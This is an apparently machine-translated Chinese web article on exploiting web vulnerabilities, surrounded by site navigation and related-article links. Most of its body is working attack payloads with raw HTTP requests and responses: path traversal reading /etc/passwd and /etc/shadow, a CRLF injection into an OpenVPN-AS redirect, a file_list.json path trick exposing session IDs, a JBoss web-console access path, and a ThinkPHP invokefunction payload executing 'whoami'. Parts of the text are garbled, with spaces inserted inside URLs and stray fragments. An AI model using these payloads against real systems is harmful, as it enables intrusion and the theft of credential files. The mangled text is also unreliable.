您当前的位置:首页 > 电脑百科 > 安全防护 > 数据安全

如何挖掘Web目录文件泄漏和其它Web漏洞利用?

时间:2020-08-03 10:21:41  来源:  作者:

可以检查安全应用程序中的漏洞。攻击者可能会发现他们可能利用的隐藏目录和敏感文件等漏洞。

如何挖掘Web目录文件泄漏和其它Web漏洞利用?

Ots ANQ

本地文件包含

带有URL /gui/file_viewer.php的应用程序可能容易受到本地文件包含(LFI)的攻击。更重要的是,攻击者可以将文件路径附加到uloaded_filename参数,该参数可以通过将特定文件的内容包含在应用程序Web根内的临时目录中来处理特定文件。

/gui/file_viewer.php?encrypt=N&target_folder=utilities& uploaded_filename=../../../../../../../etc/passwd

通过访问位于位置标头的URL参数中的URL,您将看到显示/ etc / passwd文件的内容:

如何挖掘Web目录文件泄漏和其它Web漏洞利用?

目录回显

CRLF注入

另一个示例是攻击者可能试图注入CRLF字符(例如%0A)使用以下网址:

https://<host - 域名>/__session_start__/

数据包情况:

GET /__session_start__/%0atest HTTP/1.1Host: https://<host>User-Agent: Mozilla/5.0 (X11; linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,Application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeCookie: openvpn_sess_******=**********Pragma: no-cacheCache-Control: no-cache

GET 头部 的一个情况

/_session_start_/%0atest

回响包:

HTTP/1.1 302 FoundDate: Sat, 25 April 2020 08:25:38 GMTConnection: closeContent-Type: text/html; charset=UTF-8Location: https://<host>testServer: OpenVPN-AS<html>       <body>       <p>REDIRECT</p>       </body></html>

我们可以看到已考虑%0A字符,并且字符串本身落在了无法预料的位置。

file_list.json

攻击者还可以更改/+CSCOU+/../+CSCOE+/files/file_list.json的路径,以从Web界面列出特定文件。

/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/

可以找到与其连接的用户ID。该漏洞可能允许攻击者浏览文件并泄露敏感信息。

远程执行代码

攻击者可能会将自己重定向到JBoss Web控制台页面,这意味着使用以下命令转到在localhost上运行的JBoss实例:

https:// <主机 ip - 域名> / josso /%5C ../ web-console

攻击者可以将每个请求传输到/josso/%5C../web-console,这意味着他们可以在服务器上完成所需的任何操作,例如查看备份SQL转储或更改主页。

目录遍历和本地文件包含

攻击者可以通过logName参数上的/ server / logs / download URL 获得对目标服务器的本地文件系统的未经授权的访问。这允许攻击者通过zip文件派生敏感的本地文件,例如/ etc / passwd或/ etc / shadow。例:

https:// <主机> / server / logs / download?logType = error&logName = .. / .. / .. / .. / .. / .. / .. / .. / etc / shadow&logSource = engine

数据响应包:

HTTP/1.1 200 OKContent-Type: application/octet-stream Content-Disposition: attachment; filename=”shadow.zip”Connection: Close

如您所见,/ etc / shadow的内容包含在下载的shadow.zip文件中。

/ assets /中

的/ etc / passwd / etc / passwd的内容可能在/ assets /目录中可读:

/assets/file:%2f%2f/etc/passwd

远程代码执行(RCE)

远程代码执行可以通过HTTP请求执行:

/ public //?s = index /  think  app / invokefunction&function = call_user_func_array&vars [0] = system&vars [1] [] = whoami
http:// <ip - 域名>:8080 / public //?s = index /  think  app / invokefunction&function = call_user_func_array&vars [0] = system&vars [1] [] = whoami

数据包响应:

HTTP/1.1 200 OKDate: Sat, 25 Apr 2020 0:5:12 GMTServer: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45X-Powered-By: PHP/5.4.45Content-Length: 60Connection: closeContent-Type: text/html; charset=utf-8​win-**********administratorwin-**********administrator


Tags:Web漏洞   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
一、SQL注入漏洞SQL 注入攻击( SQL Injection ),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞。在设计程序,忽略了对输入字符串...【详细内容】
2021-12-10  Tags: Web漏洞  点击:(23)  评论:(0)  加入收藏
AWVS是Acunetix Web Vulnerability Scanner的缩写它是一个自动化的Web应用程序安全测试工具,审计检查漏洞。它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web...【详细内容】
2021-01-27  Tags: Web漏洞  点击:(408)  评论:(0)  加入收藏
CSRF跨站请求伪造(Cross-Site Request Forgery)CSRF经常配合XSS一起进行攻击!(同XSS类似,都属于跨站攻击,不攻击服务器端而攻击正常访问网站的用户!)XSS利用站点内的信任用户,CS...【详细内容】
2020-10-22  Tags: Web漏洞  点击:(560)  评论:(0)  加入收藏
前边的文章中,我们已经介绍过许多漏洞扫描的工具,今天我们就来介绍其中一款名叫AWVS漏洞扫描工具的使用。Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的网络漏洞扫...【详细内容】
2020-09-04  Tags: Web漏洞  点击:(253)  评论:(0)  加入收藏
可以检查安全应用程序中的漏洞。攻击者可能会发现他们可能利用的隐藏目录和敏感文件等漏洞。Ots ANQ本地文件包含带有URL /gui/file_viewer.php的应用程序可能容易受到本地...【详细内容】
2020-08-03  Tags: Web漏洞  点击:(169)  评论:(0)  加入收藏
Kali工具库之Nikto作者:Arch3r工具简介Nikto是一个开源的WEB扫描评估软件,可以对Web服务器进行多项安全测试,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他...【详细内容】
2020-05-29  Tags: Web漏洞  点击:(139)  评论:(0)  加入收藏
SSI 注入全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。SSI是嵌入HTML页...【详细内容】
2020-05-25  Tags: Web漏洞  点击:(97)  评论:(0)  加入收藏
CSRF介绍什么是CSRF呢?我们直接看例子。https://mp.toutiao.com/profile_v3/graphic/preview?do=delete&pgc_id=6829574701128352260这个URL是头条删除pgc_id为6829574701128...【详细内容】
2020-05-25  Tags: Web漏洞  点击:(127)  评论:(0)  加入收藏
仅用于学习测试,违法自负! 这里给大家分享几点关于越权漏洞的发现方法,这类型漏洞通常发生在Web应用提供给用户基于输入的对象中,漏洞造成的影响将会致使攻击者可以绕过授权限...【详细内容】
2020-01-09  Tags: Web漏洞  点击:(136)  评论:(0)  加入收藏
首先我们要了解到漏洞扫描器的扫描原理怎样的网络漏洞扫描器对目标系统进行漏洞检测时,首先探测目标系统的存活主机,对存活主机进行端口扫描,确定系统听开放的端口,同时根据协议...【详细内容】
2019-12-10  Tags: Web漏洞  点击:(220)  评论:(0)  加入收藏
▌简易百科推荐
众所周知,Windows系统流氓软件众多,其中不乏出身大厂的产品。这些带有流氓性质的软件,很多都会偷偷扫描系统数据,读取用户文件,造成电脑卡顿拖慢不说,还严重侵害了个人隐私,造成巨...【详细内容】
2021-12-06  趣玩APPS    Tags:流氓软件   点击:(16)  评论:(0)  加入收藏
前言目标是一大学,在一次挖洞过程中遇到个sql注入,尝试进一步利用扩大危害,漏洞已报送平台进行了修复私信我获取网络安全学习资料 1.2000多本网络安全系列电子书 2.网络安全标...【详细内容】
2021-11-26  IT野涵    Tags:sql注入   点击:(21)  评论:(0)  加入收藏
互联网时代,不论是个人还是组织,都将数据视为一项重要的资产。为了便于存储、管理,企业常常会为各项数据建立一个数据库,如果没有做好安全风险防护,一旦数据库被攻占,企业将迎来很...【详细内容】
2021-10-28  快快网络   企鹅号  Tags:数据库   点击:(50)  评论:(0)  加入收藏
前言(可能思路狭隘,有缺有错,师傅们多带带)【查看资料】Author: 0ne本篇文章数据来源于18+省市级别HVV,90+单位失陷报告。(一部分是笔者的参与,一部分是薅的公司其他师傅的报告...【详细内容】
2021-10-28  IT野涵    Tags:缺口   点击:(46)  评论:(0)  加入收藏
本人也是小白一枚,大佬请绕过,这个其实是六月份的时候做的,那时候想多点实战经验,就直接用谷歌搜索找了一些网站,这个是其中一个1、目标网站 2、发现有WAF防护 3、判断存在注入...【详细内容】
2021-10-19    博客园  Tags:SQL注入   点击:(51)  评论:(0)  加入收藏
一 前言本文将针对开发过程中依旧经常出现的SQL编码缺陷,讲解其背后原理及形成原因。并以几个常见漏洞存在形式,提醒技术同学注意相关问题。最后会根据原理,提供解决或缓解方案...【详细内容】
2021-09-17  woaker    Tags:SQL注入漏洞   点击:(65)  评论:(0)  加入收藏
前言本人ctf选手一名,在最近做练习时遇到了一些sql注入的题目,但是sql注入一直是我的弱项之一,所以写一篇总结记录一下最近学到的一些sql注入漏洞的利用。可回显注入联合注入在...【详细内容】
2021-08-26  合天网安实验室    Tags:sql注入   点击:(59)  评论:(0)  加入收藏
“放纵自己的欲望是最大的祸害,窥探别人的隐私是最大的罪恶,不知自己的过失是最大的病痛”。 上文咱们知道了目前互联网的数据安全存在隐患,数据安全的问题,每天都在发生,只不过...【详细内容】
2021-08-13  小陶子矿工    Tags:IPFS   点击:(79)  评论:(0)  加入收藏
前言最近挖edusrc的时候遇到有注入点但是有waf绕不过,头疼。 可以看到还是phpstudy建站的,太熟悉了这个,不知道这个什么waf各位师傅知道的可以评论一下,所以写这篇文章是供各位...【详细内容】
2021-08-13  IT影子    Tags:sql注入   点击:(63)  评论:(0)  加入收藏
1. 使用 Burpsuite: 1. Capture the request using burpsuite. 2. Send the request to burp scanner. 3. Proceed with active scan. 4. Once the scan is finished, l...【详细内容】
2021-08-04  李志宽    Tags:SQL注入   点击:(74)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条